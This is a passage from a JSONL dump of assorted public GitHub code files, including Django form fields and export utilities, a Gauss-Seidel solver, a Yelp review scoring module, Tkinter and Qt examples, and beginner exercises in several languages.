EmailValidator()\n\n def clean(self, value):\n try:\n user = User.objects.get(email=value)\n except User.DoesNotExist as err:\n raise ValidationError(_(\"User not found\"), \"user_not_found\") from err\n return user\n\n\nclass ForeignKeyRefField(Field):\n def __init__(\n self,\n fk_type,\n initial=None,\n ):\n if not issubclass(fk_type, Model):\n raise ValueError(\"fk_type has to be a subclass of django.db.models.Model\")\n\n super().__init__(\n required=True,\n widget=HiddenInput,\n label=None,\n initial=initial,\n help_text=None,\n error_messages=None,\n show_hidden_initial=False,\n validators=(),\n localize=False,\n disabled=False,\n label_suffix=None,\n )\n\n self.fk_type = fk_type\n\n def clean(self, value):\n value = int(value)\n fk_obj = self.fk_type.objects.get(pk=value)\n if not fk_obj:\n raise ValidationError(f\"Value is not a valid pk for {self.fk_type.__qualname__}\", code=\"obj_not_found\")\n return fk_obj\n","repo_name":"Skogstomten/produce-exchange-hub","sub_path":"farmers-market/farmers_market/main/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40372437215","text":"import numpy as np\n\nfrom primat.lab2.grad import norm_sq\nfrom primat.lab3.csr import Csr\n\n\ndef zeydel(a, b, eps):\n counter = 0\n n = a.n\n xp = None\n x = np.array(b, copy=True, dtype=np.longdouble)\n while xp is None or norm_sq(x - xp) > eps**2:\n counter += 1\n xp = x.copy()\n for i in range(n):\n x[i] = b[i]\n start, end = a.r[i : i + 2]\n for v, j in zip(a.v[start:end], a.c[start:end]):\n if i != j:\n x[i] -= v * x[j]\n x[i] /= a[i, i]\n return x, counter\n","repo_name":"MegaBluejay/primat","sub_path":"primat/lab3/zeydel.py","file_name":"zeydel.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5735227876","text":"def ExecuteProgram(send_mail, prod, download_data=True, preprocess=True, create_file=True, only_base=True):\n from traceback import format_exc\n from create_excel import gather_info_for_worksheets, create_excel_file\n from preprocess import preprocess_base, preprocess_secondary_table\n from dbcomms import retrieve_last_week_data_from_dbtasy, 
retrieve_specific_dates_from_dbtasy\n from send_email import send_standard_mail\n from src.helper_functions import delete_week_file\n from logging import getLogger\n \n \n logger = getLogger('standard')\n error_logger_name = 'error_prod' if prod else 'error_test'\n error_logger = getLogger(error_logger_name)\n print()\n print('*'*80)\n delete_file = send_mail\n success = True\n if download_data:\n success, query_name = retrieve_last_week_data_from_dbtasy()\n if not success:\n logger.error('Erro na comunicação com o DB (tabela: %s): %s' % (query_name, format_exc()))\n error_logger.error('Erro na comunicação com o DB (tabela: %s): %s' % (query_name, format_exc()))\n return\n if preprocess:\n try:\n preprocess_base()\n except Exception:\n logger.error('Erro ao processar dataset base: %s' % format_exc())\n error_logger.error('Erro ao processar dataset base: %s' % format_exc())\n return\n \n for name in ['resumo de internação médica', 'atestado', 'receita', 'evolução médica', 'avaliação médica pa template']:\n try:\n preprocess_secondary_table(dataset_name=name)\n except Exception:\n logger.error('Erro ao processar %s: %s' % (name, format_exc()))\n error_logger.error('Erro ao processar %s: %s' % (name, format_exc()))\n return\n \n \n if create_file:\n try:\n if only_base:\n df_base = gather_info_for_worksheets(only_base=True)\n else:\n df_base, df_resumo_internacao, df_atestado, df_receita, df_evolucao, df_avaliacao_pa = gather_info_for_worksheets(only_base=False)\n except Exception:\n logger.error('Erro ao coletar informações para as planilhas: %s' % format_exc())\n error_logger.error('Erro ao coletar informações para as planilhas: %s' % format_exc())\n return\n\n try:\n if only_base:\n create_excel_file(df_base, only_base=True)\n else:\n create_excel_file(df_base, False, df_resumo_internacao, df_atestado, df_receita, df_evolucao, df_avaliacao_pa)\n except Exception:\n logger.error('Erro ao criar arquivo excel: %s' % format_exc())\n error_logger.error('Erro ao criar arquivo excel: %s' % format_exc())\n return\n \n if send_mail:\n try:\n send_standard_mail(prod=prod)\n except Exception:\n logger.error('Erro ao enviar emails: %s' % format_exc())\n error_logger.error('Erro ao enviar emails: %s' % format_exc())\n return\n\n if delete_file:\n try:\n delete_week_file()\n except Exception:\n logger.error('Erro ao deletar arquivo da semana: %s' % format_exc())\n error_logger.error('Erro ao deletar arquivo da semana: %s' % format_exc())\n return\n \n logger.debug('FIM: Sucesso ao executar script\\n')\n\n \nif __name__ == '__main__':\n from argparse import ArgumentParser\n import logging.config\n from configs import LOGGING_CONFIG\n \n logging.config.dictConfig(LOGGING_CONFIG)\n \n parser = ArgumentParser(description=\"My parser\")\n parser.add_argument('--prod', dest='prod', action='store_true')\n parser.add_argument('--no-email', dest='no_email', action='store_true')\n parser.add_argument('--no-download', dest='no_download', action='store_true')\n parser.add_argument('--only-base', dest='only_base', action='store_true')\n parser.set_defaults(prod=False)\n parser.set_defaults(no_email=False)\n parser.set_defaults(no_download=False)\n parser.set_defaults(only_base=False)\n \n args = parser.parse_args()\n send_mail = not args.no_email\n download_data = not args.no_download\n only_base = args.only_base\n prod = args.prod\n \n if prod:\n only_base = True\n send_mail = True\n download_data = True\n\n ExecuteProgram(send_mail=send_mail, prod=prod, download_data=download_data, 
only_base=only_base)","repo_name":"ffreller/ColetaCallCenter","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19437767836","text":"class Student:\n def __init__(self, first_name, last_name, grades=None):\n self.first_name = first_name\n self.last_name = last_name\n self.grades = grades if grades is not None else []\n\n def add_grade(self, grade):\n self.grades.append(grade)\n\n def __len__(self):\n return len(self.grades)\n\n def __str__(self):\n return f\"{self.first_name} {self.last_name} - Оцінки: {self.grades}\"\n\n# Створення списку студентів\nstudents = [\n Student(\"Олександр\", \"Петров\", [5, 4, 4, 5]),\n Student(\"Ірина\", \"Сергієнко\", [4, 5]),\n Student(\"Анна\", \"Іванова\", [5, 4, 4, 5, 3]),\n Student(\"Володимир\", \"Мельник\")\n]\n\n# Додаємо оцінки для Володимира\nstudents[3].add_grade(4)\nstudents[3].add_grade(3)\n\n# Сортуємо список студентів за кількістю оцінок\nsorted_students = sorted(students, key=lambda student: len(student), reverse=True)\n\n# Виведення відсортованого списку\nfor student in sorted_students:\n print(student)\n","repo_name":"barsuk4/IT-Brain","sub_path":"L011/it-brain_065.py","file_name":"it-brain_065.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20878854610","text":"from .models import *\nfrom django.db.models import Max\n# Helper functions to be used throughout the project\n\n# Returns a dictionary with listing as key and max_bid as value\ndef get_max_bids(listings):\n listings_max_bids = {}\n max_bids = Bid.objects.values('listing').annotate(Max('bid'))\n\n for listing in listings:\n listings_max_bids[listing] = max_bids.get(listing=listing)['bid__max']\n return listings_max_bids","repo_name":"melshinawy/cs50-project2-commerce","sub_path":"auctions/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7330927807","text":"from modules.useful_functions import *\n\nfrom itertools import islice\nimport json\nfrom textblob import TextBlob\n# run python3 -m textblob.download_corpora\nfrom tqdm import tqdm\n\n\nclass Dataset():\n\n def __init__(self, n_reviews, dataset_name):\n self.n_reviews = n_reviews\n if dataset_name == \"Yelp\":\n restaurants_ids = load_or_create_cache(n_reviews, \"restaurants_ids\", self.find_restaurants_id, \"dataset/yelp_academic_dataset_business.json\")\n self.dict_reviews = load_or_create_cache(n_reviews, \"reviews\", self.find_restaurants_good_reviews, \"dataset/yelp_academic_dataset_review.json\", restaurants_ids)\n self.reviews = load_or_create_cache(n_reviews, \"sentences\", self.extract_texts, self.dict_reviews)\n\n def find_restaurants_id(self, file_path):\n \"\"\"\n returns list of 'business_id' with 'Restaurants' in 'categories'\n \"\"\"\n restaurants_ids = []\n with open(file_path) as f:\n for line in tqdm(f):\n business = json.loads(line)\n if business[\"categories\"]:\n if 'Restaurants' in business[\"categories\"]:\n restaurants_ids.append(business[\"business_id\"])\n \n return restaurants_ids\n\n def find_restaurants_good_reviews(self, file_path, restaurants_ids):\n \"\"\"\n returns list of reviews (= dict, so as in json file) matching requirements on business.categories and reviews.helpful\n \"\"\"\n 
reviews = []\n if self.n_reviews == 'all':\n with open(file_path) as f:\n for line in tqdm(f):\n review = json.loads(line)\n if review[\"business_id\"] in restaurants_ids and review[\"useful\"] > 3:\n reviews.append(review)\n else:\n with open(file_path) as f:\n reviews = list(islice(f, self.n_reviews))\n reviews = [json.loads(review) for review in reviews]\n reviews = [review for review in reviews if (review[\"business_id\"] in restaurants_ids) and (review[\"useful\"])]\n reviews = [review for review in reviews if review[\"useful\"] > 3]\n print(f'{len(reviews)} reviews')\n return reviews\n\n def extract_texts(self, dict_reviews):\n \"\"\"\n returns list of list of strings\n list of reviews x list of raw sentences\n \"\"\"\n reviews = []\n n_sentences = 0\n for review_idx, dict_review in tqdm(enumerate(dict_reviews)):\n review = Review(dict_review, len(reviews))\n raw_sentences = review.blob.raw_sentences\n # for s in raw_sentences:\n # if not s.lower().islower():\n # print(f'\\n\\n\\n !!!!! ISSUE with sentence in review {review_idx} \\n {b} \\n\\n\\n')\n for raw_sentence in raw_sentences:\n review.sentences.append(Sentence(raw_sentence, review_idx, n_sentences))\n n_sentences += 1\n reviews.append(review)\n return reviews\n\nclass Review():\n\n def __init__(self, dict_review, review_idx):\n self.idx = review_idx\n self.id = dict_review['review_id']\n self.text = dict_review['text']\n self.blob = TextBlob(self.text)\n self.sentences = []\n self.scores = dict()\n self.labeled_stars = float(dict_review['stars'])\n self.estimated_stars = None\n self.criteria_weights = dict()\n self.n_criteria = 0\n\n def compute_multicriteria_scores(self, criteria_names):\n extended_scores = {criterion: [] for criterion in criteria_names}\n for sentence in self.sentences:\n if sentence.criterion and sentence.polarity_score:\n criterion, weight = sentence.criterion\n extended_scores[criterion].append((sentence.idx, weight, sentence.polarity_score))\n for criterion in criteria_names:\n if extended_scores[criterion]:\n self.n_criteria += 1\n criterion_weight = sum([weight for (_, weight, _) in extended_scores[criterion]])\n self.criteria_weights[criterion] = criterion_weight\n score = sum([weight * polarity for (_, weight, polarity) in extended_scores[criterion]])/criterion_weight\n self.scores[criterion] = (score+1)/2*5 + 0.5\n else:\n self.scores[criterion] = None\n self.criteria_weights[criterion] = 0\n self.extended_scores = extended_scores\n\n def show_sentence_criterion_polarity(self):\n text = f'*******************\\nREVIEW {self.idx}\\n*******************\\n'\n for criterion in self.extended_scores.keys():\n text += criterion + '--------------\\n'\n weights_sum = sum([weight for _, weight, _ in self.extended_scores[criterion]])\n for sentence_idx, weight, _ in self.extended_scores[criterion]:\n sentence = [sentence for sentence in self.sentences if sentence.idx == sentence_idx][0]\n text += f\"{round(weight/weights_sum*100)}% / {sentence.polarity_score} -- {sentence.raw_sentence}\\n\"\n text += 'None --------------\\n'\n for sentence in self.sentences:\n if not sentence.criterion or not sentence.polarity_score:\n text += sentence.raw_sentence + '\\n'\n print('\\n'+text)\n \n def compute_mean_stars(self, criteria_names, stars_averaging):\n if stars_averaging == 'weighted':\n total_weight = sum(list(self.criteria_weights.values()))\n self.estimated_stars = 0\n for criterion in criteria_names:\n if self.criteria_weights[criterion]:\n self.estimated_stars += self.criteria_weights[criterion]/total_weight * 
self.scores[criterion]\n elif stars_averaging == 'equi':\n no_none = [score for score in self.scores.values() if score != None]\n if no_none:\n self.estimated_stars = sum(no_none)/len(no_none)\n\nclass Sentence():\n\n def __init__(self, raw_sentence, review_idx, sentence_idx):\n self.raw_sentence = raw_sentence\n self.review_idx = review_idx\n self.idx = sentence_idx\n self.criterion = None\n self.polarity_score = None\n","repo_name":"sandrinedacol/multicriteria-ratings","sub_path":"modules/reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":6265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"23031198958","text":"import csv\nfrom xml.dom.minidom import Document\nimport hashlib\n\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom django.template.defaultfilters import slugify\nfrom django.utils import simplejson as json\n\n\n## Taken from http://djangosnippets.org/snippets/790/\ndef export_csv(qs, filename, fields=None):\n model = qs.model\n response = HttpResponse(mimetype='text/csv')\n response['Content-Disposition'] = ('attachment; filename=%s.csv'\n % slugify(filename))\n writer = csv.writer(response)\n # Write headers to CSV file\n if fields:\n headers = fields\n else:\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n fields = headers\n _headers = []\n for header in headers:\n if header:\n _headers.append(header)\n else:\n _headers.append(unicode(model._meta.verbose_name))\n\n headers = _headers\n\n writer.writerow(headers)\n # Write data to CSV file\n for obj in qs:\n row = []\n for field in fields:\n if field == '':\n val = unicode(obj)\n else:\n val = getattr(obj, field)\n if callable(val):\n val = val()\n elif getattr(val, 'all', None):\n val = ', '.join([unicode(item) for item in val.all()])\n # work around csv unicode limitation\n elif type(val) == unicode:\n val = val.encode(\"utf-8\")\n row.append(val)\n writer.writerow(row)\n # Return CSV file to browser as download\n return response\n\n\ndef export_json(qs, filename, fields=None):\n model = qs.model\n\n if not fields:\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n fields = headers\n objs = []\n for obj in qs:\n item = {}\n for field in fields:\n if field == '':\n field = unicode(obj._meta.verbose_name)\n val = unicode(obj)\n else:\n val = getattr(obj, field)\n if callable(val):\n val = val()\n elif getattr(val, 'all', None):\n val = [unicode(i) for i in val.all()]\n # work around csv unicode limitation\n elif type(val) == unicode:\n val = val.encode(\"utf-8\")\n item[field] = val\n objs.append(item)\n # Return JS file to browser as download\n serialized = json.dumps(objs)\n response = HttpResponse(serialized, mimetype='application/json')\n response['Content-Disposition'] = ('attachment; filename=%s.json'\n % slugify(filename))\n return response\n\n\ndef export_xml(qs, filename, fields=None):\n model = qs.model\n xml = Document()\n root = xml.createElement(filename)\n xml.appendChild(root)\n if not fields:\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n fields = headers\n for obj in qs:\n item = xml.createElement(model._meta.object_name)\n item.setAttribute(\"id\", unicode(obj))\n for field in fields:\n if field != '':\n val = getattr(obj, field)\n if getattr(val, 'all', None):\n for v in val.all():\n element = xml.createElement(field)\n xmlval = xml.createTextNode(unicode(v))\n element.appendChild(xmlval)\n 
item.appendChild(element)\n else:\n if callable(val):\n val = val()\n # work around csv unicode limitation\n elif type(val) == unicode:\n val = val.encode(\"utf-8\")\n\n element = xml.createElement(field)\n xmlval = xml.createTextNode(val)\n element.appendChild(xmlval)\n item.appendChild(element)\n root.appendChild(item)\n # Return xml file to browser as download\n response = HttpResponse(xml.toxml(), mimetype='application/xml')\n response['Content-Disposition'] = ('attachment; filename=%s.xml'\n % slugify(filename))\n return response\n\n\nexport_modes = {\n 'csv': export_csv,\n 'json': export_json,\n 'xml': export_xml,\n }\n\n\ndef export_query_set(mode, qs, filename, fields=None):\n if mode in export_modes:\n return export_modes[mode](qs, filename, fields)\n else:\n content = \"Error 400, Format %s is not supported\" % mode\n return HttpResponseBadRequest(content)\n","repo_name":"Yaco-Sistemas/met","sub_path":"met/metadataparser/query_export.py","file_name":"query_export.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"43513254364","text":"from django import forms\n\n\nclass RegistrationLinkAdminForm(forms.ModelForm):\n def __init__(self, data=None, *args, **kwargs):\n super().__init__(data, *args, **kwargs)\n\n # limit choices of subjects\n subjects_choices = self.fields[\"subject_variants\"].widget.choices\n subjects_choices.queryset = subjects_choices.queryset.filter(\n subject__school_year=self.school_year,\n subject__subject_type=self.subject_type,\n )\n","repo_name":"leprikon-cz/leprikon","sub_path":"leprikon/forms/registrationlink.py","file_name":"registrationlink.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"21639920127","text":"# TKinter documentation: http://tcl.tk/man/tcl8.6/TkCmd/label.htm\nimport tkinter\n\n# Tk() is like screen in Turtle!\nwindow = tkinter.Tk()\nwindow.title(\"My First GUI Program\")\nwindow.minsize(width=500, height=300)\n\n\n# 🟪 Label\nmy_label = tkinter.Label(text=\"I Am a Label\", font=(\"Arial\", 24, \"bold\"))\nmy_label.pack() # Pack our label onto the screen! (이 라인이 없으면 label이 안보임!)\n # pack()안에 들어갈 arguments가 ...면 default value가 있다는 뜻!!\n# Packer: Geometry Management System (It's just a simple way to lay out the components that you're building.)\n\nimport turtle\ntim = turtle.Turtle()\ntim.write(\"Hello\") # arguments중 arg: 에는 ...가 없다. 
그러므로 Default 값이 없으므로 무조건 부여해주어야하는 값!\n\n# window.mainloop() behaves like while loop when we covered Turtle\nwindow.mainloop() # Always at the end of the program\n","repo_name":"Komerica/python","sub_path":"udemy/day-27(tkinter, label)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10449191994","text":"largest = None\nsmallest = None\n\nwhile True:\n num = input(\"Enter a number: \")\n if num == \"done\":\n break\n try:\n num = int(num)\n if(largest == None):\n largest = num\n else:\n if(largest < int(num)):\n largest = int(num)\n if(smallest == None):\n smallest = num\n else:\n if(smallest > int(num)):\n smallest = int(num)\n except:\n print(\"Invalid input\")\n\nprint(\"Maximum is\", largest)\nprint(\"Minimum is\", smallest)\n","repo_name":"shelcia/InterviewQuestionPython","sub_path":"Coursera/FinalProgram.py","file_name":"FinalProgram.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"45199158088","text":"import logging\nfrom customUser.models import Orders, PaymentDetails\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom customAdmin.helpers import send_email\nfrom .models import Email_Template, Product, User\n\nlogger = logging.getLogger(__name__)\n\n\n# @receiver(post_save, sender=User)\ndef handle_email(sender, instance, created, **kwargs):\n try:\n email = Email_Template.objects.get(code='ET05')\n if created:\n send_email(\n emails=[value.email for value in User.objects.filter(\n is_superuser=True)],\n subject=email.subject,\n message=email.message,\n username=instance.username,\n user_email=instance.email\n )\n except Exception as e:\n logger.error(e)\n\n# @receiver(post_save, sender=User)\n# def handle_cart(sender, instance, created, **kwargs):\n# try:\n# if created:\n# if request.session.session_key:\n# cart = []\n# for key, value in request.session.items():\n# if key == '_auth_user_id' or key == '_auth_user_backend' or key == '_auth_user_hash':\n# pass\n# else:\n# cart.append({'key': int(key), 'quantity': int(value)})\n# login(request, user)\n# for product in cart:\n# ProductDetails.add_product(\n# self, request, product['key'], product['quantity'])\n# except Exception as e:\n# logger.error(e)\n\n\n# @receiver(post_save, sender=Orders)\ndef handle_payment(sender, instance, created, **kwargs):\n try:\n if created:\n PaymentDetails.objects.create(\n payment_status='Pending',\n order_id=instance.id,\n user_id=instance.user_id,\n )\n except Exception as e:\n logger.error(e)\n\n# @receiver(post_save, sender=Product)\n\n\ndef handle_out_of_stock_status(sender, instance, created, **kwargs):\n try:\n if created:\n if instance.quantity <= 0:\n instance.out_of_stock_status = True\n except Exception as e:\n logger.error(e)\n\n\npost_save.connect(handle_payment, sender=Orders)\n\npost_save.connect(handle_email, sender=User)\n\npost_save.connect(handle_out_of_stock_status, sender=Product)\n","repo_name":"Khushi-Jain1/ecommerce_django","sub_path":"customAdmin/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18087589558","text":"dic= {\n 'a':50, \n 'b':58, \n 'c':56,\n 'd':40, \n 'e':100, \n 'f':20\n }\nlist1=[]\nfm=0\nsm=0\ntm=0\nfor i in dic:\n for j in dic:\n if dic[j]>fm:\n 
fm=dic[j]\n if fm>dic[j] and dic[j]>sm:\n sm=dic[j]\n if sm>dic[j] and dic[j]>tm:\n tm=dic[j]\nlist1.append(fm)\nlist1.append(sm)\nlist1.append(tm)\nprint(list1)\n\n","repo_name":"ShubhamKulkarni1495/Dictionary","sub_path":"Dictionary/meraki/q11.py","file_name":"q11.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13304546246","text":"import random\ndef coinToss():\n number = input(\"Number of times to flip coin: \")\n recordList = []\n heads = 0\n tails = 0\n for amount in range(number):\n flip = random.randint(0, 1)\n if (flip == 0):\n print(\"Heads\")\n recordList.append(\"Heads\")\n else:\n print(\"Tails\")\n recordList.append(\"Tails\")\n print(str(recordList))\n print(str(recordList.count(\"Heads\")) + str(recordList.count(\"Tails\")))\n","repo_name":"aliya-rahmani/Projects","sub_path":"Python/coinflip.py","file_name":"coinflip.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"99"} +{"seq_id":"28298998990","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n###################################################################\n# Author: wang donghao\n# Date : 2020.7\n# Email : dd.parkhere@gmail.com\n###################################################################\n\nfrom dayu_widgets.qt import *\nimport os\nimport shutil\nfrom config import envs\nreload(envs)\n\n\nclass WImage(QWidget):\n _prePixmap = None\n\n @property\n def prePixmap(self):\n return self._prePixmap\n\n @prePixmap.setter\n def prePixmap(self, imagePath):\n self.img_path = imagePath\n # if not os.path.exists(imagePath):\n # raise\n\n # self.title.setText(os.path.splitext(os.path.basename(imagePath))[0])\n\n self._prePixmap = None\n # temp_folder = envs.env_dict.get('WOK_TEMP_DIR')\n # file_name = temp_folder.split('/')[-1].split('\\\\')[-1]\n # dest_thumb = temp_folder + file_name\n # shutil.copyfile(imagePath.encode('GB2312'), dest_thumb)\n # img = QImage(dest_thumb)\n # print imagePath\n # img = img.scaledToWidth(40)\n # self._prePixmap = QPixmap.fromImage(img)\n self._prePixmap = QPixmap(imagePath)\n if self._prePixmap.isNull():\n self._prePixmap.load(imagePath, 'jpg')\n\n def __init__(self, parent=None):\n super(WImage, self).__init__(parent)\n\n mainLayout = QVBoxLayout()\n mainLayout.setSpacing(0)\n self.setLayout(mainLayout)\n\n # self.title = QLabel('preview')\n # self.title.setAlignment(Qt.AlignCenter)\n # mainLayout.addWidget(self.title)\n\n self.previewLabel = QLabel()\n self.previewLabel.setSizePolicy(QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n self.previewLabel.setAlignment(Qt.AlignCenter)\n self.previewLabel.setMinimumSize(40, 40)\n mainLayout.addWidget(self.previewLabel)\n\n sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())\n\n self.setSizePolicy(sizePolicy)\n\n self.img_path = ''\n\n def resizeEvent(self, QResizeEvent):\n scaledSize = self.prePixmap.size()\n scaledSize.scale(self.previewLabel.size(), Qt.KeepAspectRatio)\n if not self.previewLabel.pixmap() or scaledSize != self.previewLabel.pixmap().size():\n self.updatePreviewLabel()\n\n def updatePreviewLabel(self):\n self.previewLabel.setPixmap(self.prePixmap.scaled(\n self.previewLabel.size(), Qt.KeepAspectRatio,\n Qt.SmoothTransformation))\n\n def mouseDoubleClickEvent(self, *args, 
**kwargs):\n thumbnail_win = QDialog(self.parent())\n layout = QHBoxLayout()\n label = QLabel()\n label.setPixmap(self.prePixmap)\n layout.addWidget(label)\n thumbnail_win.setLayout(layout)\n thumbnail_win.show()\n # os.startfile(self.img_path)\n\n\nclass WImage2(QLabel):\n\n def __init__(self, parent=None, img_path=''):\n super(WImage2, self).__init__(parent=parent)\n default = os.environ['WOKWOK_ROOT'] + '/resources/icons/thumb-load-error.png'\n if not os.path.isfile(img_path):\n img_path = default\n try:\n img = QImage(img_path)\n except:\n img = QImage(default)\n w, h = img.width(), img.height()\n for _ in xrange(999):\n if w <= 100:\n break\n w = w * 0.9\n h = h * 0.9\n size = QSize(w, h)\n pic = QPixmap(img.scaled(size, Qt.IgnoreAspectRatio))\n # widget.setFixedSize(30, 20)\n self.prePixmap = QPixmap(img_path)\n self.setPixmap(pic)\n\n def mouseDoubleClickEvent(self, *args, **kwargs):\n thumbnail_win = QDialog(self.parent())\n layout = QHBoxLayout()\n label = QLabel()\n label.setPixmap(self.prePixmap)\n layout.addWidget(label)\n thumbnail_win.setLayout(layout)\n thumbnail_win.show()\n # os.startfile(self.img_path)\n\n\nclass WThumbnailDelegate(QItemDelegate):\n def __init__(self, parent=None):\n super(WThumbnailDelegate, self).__init__(parent=parent)\n\n def paint(self, painter, option, index):\n painter.save()\n painter.setPen(QPen(Qt.NoPen))\n value = index.data(Qt.DisplayRole)\n pix_map = QPixmap(value) # .scaledToWidth(100)\n pix_bili = float(pix_map.width())/pix_map.height()\n new_height = 100.0/pix_bili\n pix_map = pix_map.scaled(100.0, new_height)\n painter.drawPixmap(option.rect, pix_map)\n painter.restore()\n self.parent().setRowHeight(index.row(), new_height)\n\n\n","repo_name":"DangoWang/WOKWOK","sub_path":"widgets/thumbnail_delegate.py","file_name":"thumbnail_delegate.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"27116076933","text":"#first we can use files that time import library is known as inside flies folder library .\nfrom files import addition,factorial,multiplication,pattern,subtraction\n\n#check the directry of files folder \n\n# print(dir(files)) :- check the directry\n\n# whiile True:\n# addition modules files access\n# b = int(input(\"Enter Your Second : \"))\n# a = int(input(\"Enter Your First : \"))\n\n# help(files) :- help the files\n\nadd = addition.addition(12, 23)\nprint(f\"This is addition for two no :{add}\\n\")\n\n\n# subtraction modules files access \n# a = int(input(\"Enter Your First : \"))\n# b = int(input(\"Enter Your Second : \"))\n\nsub = subtraction.substraction(10, 20)\nprint(f\"This is Subtraction is {sub}\\n\")\n\n# this is multiplication\n\nmul = multiplication.multiplication(10, 5)\nprint(f\"This is multiplication {mul}\\n\")\n\n#this is pattern design \n\npattern.pattern(5)\n\n\n\n\n","repo_name":"PushpendraMaurya/Python-Full-Stack-Developrs-Notes--2023--Portions","sub_path":"Full Python-Syllabus-Explanation/Library/Modules/User Define Modules/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74439635204","text":"from collections import defaultdict\n\nif __name__ == '__main__':\n N = int(input())\n city_len = [0] + list(map(int, input().split()))\n city = list(map(int, input().split()))\n\n ans_dict = defaultdict(int)\n temp = city[0]\n\n for i in range(1,len(city)):\n ans_dict[temp] += 
city_len[i]\n if temp > city[i]:\n temp = city[i]\n\n ans = 0\n for k in ans_dict.keys():\n ans += (k * ans_dict[k])\n\n print(ans)","repo_name":"gan-ta/Algorithm","sub_path":"BackJoonOnline/[BOJ]13305_주유소.py","file_name":"[BOJ]13305_주유소.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4964448723","text":"#---------EXERCICE 1--------#\n\"\"\"extraire l'ensemble des voyelles\"\"\"\n\nfrom typing import AsyncGenerator\n\n\ndef extrait_ensemble_voyelles():\n mot=\"quelconque\"\n while mot !=\"fin\":\n mot= input(\"rentrez un mot(sans accent):\")\n#on met toutes les lettres en miniscule \n mot_min= mot.lower()\n#on crée la liste des voyelles\n liste_voyelles=\"a\",\"e\",\"i\",\"o\",\"u\",\"y\"\n\n#on initialise le compteur de voyelles\n nb_voyelles= 0\n\n#la boucle de comptage\n for lettre in mot_min:\n if lettre in liste_voyelles:\n nb_voyelles +=1\n\n#l'affichage des résultats\n if nb_voyelles==0:\n return (\"il n'y a pas de voyelles dans le mot\\\" +mot+\"\"\\\".\\n\")\n elif nb_voyelles==1:\n return (\"il y a une seule voyelle dans le mot\\\" +mot+\"\"\\\".\\n\")\n else:\n return(\"n\\n\")\n return nb_voyelles.lower()\n #input(\"appuyer sur entrer pour terminer le programme\")\n\n#exercice2\ndef transforme_en_numeros(mot):\n \n if len(age) != 1:\n return 0\n new = ord(age)\n if 65 <= new <= 90:\n # Lettre majuscule\n return new - 64\n elif 97 <= new <= 122:\n # letter miniscule\n return new - 96\n # caractère méconnu\n return 0\n#exercice 3\n\ndef contenu_cellule(colonne, ligne, univers):\n pass\n\n\n","repo_name":"yvann-TEFLAN/EVALUATION1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37261336548","text":"import numpy as np\n\na = {'a' : 0, 'b':1, 'c':2}\n\n# for attr in dir(a):\n# print(attr)\n\na = 10\n# print(id(a))\n\na = 20\n# print(id(a))\n\na = np.array([1,2,3])\nb = [1,2,3]\nc = (1,2,3)\nprint(type(a))\nfor attr in dir(a):\n if not attr.startswith('__'):\n print(attr)\n\nprint(type(b))\nfor attr in dir(b):\n if not attr.startswith('__'):\n print(attr)\n\nprint(type(c))\nfor attr in dir(c):\n if not attr.startswith('__'):\n print(attr)\n\nx = {'a' : 1, 'b' : 2}\ny = {'b' : 3, 'c' : 4}\n\nz = {**x, **y}\n\nprint(z)\n\na = [1,2,3]\nb = [4,5,6]\n\nprint(\"enumerate(a+b)\")\nfor index, value in enumerate(a+b):\n print(index,value)\n\nprint(\"enumerate(zip(a+b))\")\nfor index, value in 